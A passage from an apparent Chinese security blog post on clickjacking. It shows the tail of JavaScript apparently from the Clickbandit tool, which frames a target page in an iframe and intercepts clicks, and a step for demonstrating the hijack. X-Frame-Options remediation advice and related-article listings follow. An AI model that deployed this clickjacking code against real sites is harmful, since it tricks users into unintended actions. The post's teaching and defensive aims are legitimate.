              css += 'background-image: linear-gradient(to bottom, #f4973a, #e06228);';
              css += '-webkit-border-radius: 10;';
              css += '-moz-border-radius: 10;';
              css += 'border-radius: 10px;';
              css += 'color: #ffffff;';
              css += 'font-size: 15px;';
              css += 'padding: 10px 10px 10px 10px;';
              css += 'text-decoration: none;';
              css += 'border: solid #ffa200 1px;';
              css += 'cursor:pointer;';
            css += '}';
            css += '.btn:hover {';
              css += 'background: #ffddba;';
              css += 'background-image: -webkit-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: -moz-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: -ms-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: -o-linear-gradient(top, #ffddba, #e06228);';
              css += 'background-image: linear-gradient(to bottom, #ffddba, #e06228);';
              css += 'text-decoration: none;';
            css += '}';
            css += 'h1 {';
            css += 'color:#585A5C;';
            css += 'margin:0;padding:0;';
            css += 'margin-top:10px;';
            css += 'margin-left:10px;';
            css += 'font-size:22pt;';
            css += 'border:none;';
            css += '}';
            css += 'h1 span {';
            css += 'color:#f4983b;';
            css += '}';
        return css;
    }
    function createStyles(doc, node) {
        var css = generateCssString(), style = doc.createElement('style');
        style.appendChild(doc.createTextNode(css));
        node.appendChild(style);
    }
    function ready() {
        var iframe = document.createElement('iframe');
        if(location.protocol === 'data:') {
            return false;
        }
        width = getDocWidth(document);
        height = getDocHeight(document);
        removeNodes(document.body);
        disableStyles();
        createStyles(document, document.body);
        createMenu(createHeader(document, document.body));
        iframe.style.width = width + 'px';
        iframe.style.height = height + 'px';
        iframe.style.position = 'relative';
        iframe.frameborder = 0;
        iframe.scrolling = 'no';
        iframe.style.border = 'none';
        iframe.id = 'clickbandit_frame';
        document.body.appendChild(iframe);
        iframe.onload = function() {
            win = this.contentWindow;
            doc = win.document;
            interceptClicks();
        };
    }
    window.clickbandit = {start: start, mode: 'record', finish: finish, version: "1.0.5", disableClickActions: false, sandbox: false};
    window.addEventListener('DOMContentLoaded', ready, false);
    if(document.readyState === 'complete') {
        ready();
    }
}();

6)点击start,然后在页面上点击几个功能模块,finish,就会发现页面已经被劫持

3.修复建议

X-FRAME-OPTIONS是目前最可靠的方法。X-FRAME-OPTIONS是微软提出的一个http头,专门用来防御利用iframe嵌套的点击劫持攻击。并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。
这个头有三个值:
DENY:拒绝任何域加载
SAMEORIGIN:允许同源域下加载
ALLOW-FROM:可以定义允许frame加载的页面地址

 

 

_GUOGUO
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Tomcat 点击劫持:X-Frame-Options Header未配置【已解决】
身后是非的博客
03-14 1万+
X-Frame-Options Header未配置背景漏洞描述修复和改进建议具体解决办法TomcatApacheNginx自定义过滤器验证 背景 最近就新开发项目进行网络安全监测,检测报告中发现含有点击 劫持:X-Frame-Options Header未配置 (低危) Web安全漏洞,下面为具体解决方法 漏洞描述 X-Frame-Options HTTP 响应头是用来给浏览器指示允许一个页...
Web渗透测试-常见漏洞解析课件
03-23
Web渗透测试是网络安全领域的重要部分,它涉及到对Web应用程序的安全性进行系统性的检查,以发现潜在的漏洞并防止黑客攻击。本课件“Web渗透测试-常见漏洞解析”旨在深入探讨这一主题,帮助学习者理解和掌握如何有效...
2024年网络安全-点击劫持(ClickJacking)的原理、攻击及防御,从三流网络安全外包到秒杀阿里P7,
2401_84253089的博客
05-11 963
2008年,安全专家Robert Hansen 与Jeremiah Grossman发现了一种被他们称为点击劫持(ClickJacking)的攻击。他们准备在OWASP安全大会上公布并进行演示,但是由于很多平台都中了招,包括Adobe在内的厂商要求在漏洞修补前不要公开此问题。
渗透测试成长之路---前端安全
weixin_43727063的博客
04-21 554
前端安全 职业名词 解释 payload 攻击代码 EXP 完整的漏洞利用工具 POC 观点验证程序。运行这个程序可以得出预期的结果 GPC GET POST COOKIE 1、跨站脚本攻击 ​ 跨站点脚本(XSS) 是指客户端代码注入攻击,攻击者在合法网站或web应用程序中执行恶意脚本。当web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS 1.1、Web架构 Web架构包括: ​ 服务端: ​ Web容器 Apache
渗透测试-地基篇-Cobal Strike-taowu梼杌详细介绍(十九)
qq_34801745的博客
12-10 7986
** 渗透测试-地基篇-后渗透Metasploit meterpreter篇(十九) ** 作者:大余 时间:2020-12-09 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言:
点击劫持漏洞
weixin_52501704的博客
02-07 3262
点击劫持漏洞学习
测试渗透前置知识-行业术语
TianYao
02-10 3987
测试渗透前置知识-行业术语1.肉鸡3.远控4.黑页5.挂马6.大马7.小马8.一句话后门9.后门10.拖库11.社工库12.撞库13.提权14.网络钓鱼15.社会工程学攻击16.rootkit17.IPC$18.弱口令19.默认共享20.shell21.交互式shell22.webshell23.溢出24.注入25.注入点26.旁站入侵27.C段渗透28.内网:29.外网30.中间人攻击31.端口32.免杀33.加壳34.花指令35.TCP/IP36.蜜罐37.拒绝服务攻击38.CC攻击39.脚本注入攻击(
渗透测试零基础入门到精通成长之路
z099164的博客
03-25 259
渗透测试零基础入门到精通成长之路
渗透测试工具大全
最新发布
2401_84466336的博客
05-24 1199
所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。3不会收取任何广告费用,展示的所有工具链接与本人无任何利害关系。
小白入坑 Web 渗透测试必备指南
YunWisdom
06-27 1258
小白如何快速入门 由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我。再者,内容不会完全讲清楚,因为本身话题的原因,部分会一笔带过。 小白该如何踏入 Web 安全这个坑呢?我的经历是,兴趣所在。我是野路子,全靠兴趣来自学。 现 Web 安全如果要讲入门,要求并不高,两三天就能入门,而我也仅在入门级别。 我接触这个比较早,最初是在10年还是09年来接触到一份网传 Web ...
Web安全-渗透测试-基础知识01
Python栈
06-16 236
域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的互联网上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识.因为ip地址不方便记忆.而且不能显示地址组织的名称和性质,所以用域名也可以定位到响应的up,可简单理解为是ip地址的另一个称呼。
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
渗透测试是一种合法的安全测试方法,用于检测网络和系统的漏洞,以增强安全性。在这个过程中,测试者模拟黑客的行为,试图找出并利用系统中的弱点。本文档介绍了一种常用的渗透测试工具——Beef,以及如何利用它对...
E022-渗透测试常用工具-使用ferret进行Cookie劫持.pdf
12-02
渗透测试是一种安全评估方法,通过模拟黑客攻击行为来检测系统防护能力。在这个过程中,使用了ferret工具来执行Cookie劫持,这是一种常见的攻击手段,用于获取用户的登录凭据,特别是那些存储在Cookie中的会话ID。...
渗透测试工具-weblogic\shiro
10-17
渗透测试是一种安全评估方法,主要用于发现并修复网络和应用程序中的潜在漏洞。在IT行业中,WebLogic和Apache Shiro是两个非常关键的组件,而“渗透测试工具-weblogic\shiro”可能指的是针对这两个组件的专用工具...
点击劫持漏洞案例ppt
01-02
4. **综合测试工具**: 利用自动化工具(如WVS等)进行全面的安全扫描,这些工具通常能够自动检测出点击劫持漏洞。 #### 四、点击劫持攻击案例分析 **案例1:Facebook的“Likejacking”攻击** - 在此攻击中,攻击...
深信服EDR终端响应平台
热门推荐
m0_51186260的博客
06-14 1万+
深信服EDR检测响应平台
态势感知(SIP)
m0_51186260的博客
06-17 1万+
SIP态势感知 一、SIP态势感知概述 1.业界标准 数据来源>智能分析>安全可视>协同响应 通过日志采集探针和流量传感器分别进行不同系统日志和流量日志的采集和处理任务 通过对海量数据进行多维度快速,自动化的关联分析发现本地的威胁和异常行为,并及时与终端管理系统和下一代防火墙进行联动 对威胁和异常行为进行处置。 组件: 分析平台:负责对数据的汇总、分析、呈现 流量传感器;负责旁路部署在网络中,对流量进行采集 日志采集探针:日志采集必要组件,归一化日志传给平台分析 关联引擎:补充组件,当日志
渗透测试成长篇-Apache Tomcat样例目录session操纵漏洞
m0_51186260的博客
08-10 7344
1.前言: 大家好,渗透测试小白成长的一次分享。大佬绕过,在我前几天的一次渗透测试项目中,在用AWVS扫的时候,偶然的发现了这个漏洞,说真的,这个漏洞是我渗透测试第一次遇到,就简单的复现记录一下,对我来说,分享就是成长。 2.背景: 用AWVS扫到一个漏洞 翻译了一下,这叫做Apache Tomcat样例目录session操纵漏洞 Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例,其中session样例(/examples/servlets/servlet/
nginx点击劫持漏洞修复
05-10
点击劫持是一种常见的 Web 安全漏洞,攻击者会将一个网站嵌入到另一个网站中,通过隐藏或者伪装的方式,欺骗用户去点击一个看似无害的链接,从而实现攻击者的恶意目的。nginx 本身并没有针对点击劫持的专门防御机制,但是我们可以通过一些方法来修复这个漏洞: 1. X-Frame-Options 防御点击劫持 在 nginx 的配置文件中,可以通过设置 X-Frame-Options 来防御点击劫持。X-Frame-Options 是一个 HTTP 响应头,可以控制浏览器是否允许当前页面在 iframe 中展示。我们可以将其设置为 DENY,表示当前页面不能在 iframe 中展示,从而防止点击劫持攻击。示例配置如下: ``` add_header X-Frame-Options DENY; ``` 2. JavaScript 防御点击劫持 另外,我们还可以通过 JavaScript 来防御点击劫持。在页面中嵌入一个透明的 iframe,覆盖整个页面,当用户点击页面时,我们可以通过 JavaScript 判断点击事件的坐标是否在 iframe 内,如果是,则说明用户是在被劫持的页面中点击,我们可以将当前页面重定向到其他页面,从而避免被攻击。示例代码如下: ``` if (top != self) { top.location = self.location; } ``` 综上所述,我们可以通过 X-Frame-Options 和 JavaScript 来防御点击劫持漏洞。建议开发人员在开发过程中注意防范这种漏洞,以保障用户的安全。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_GUOGUO

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值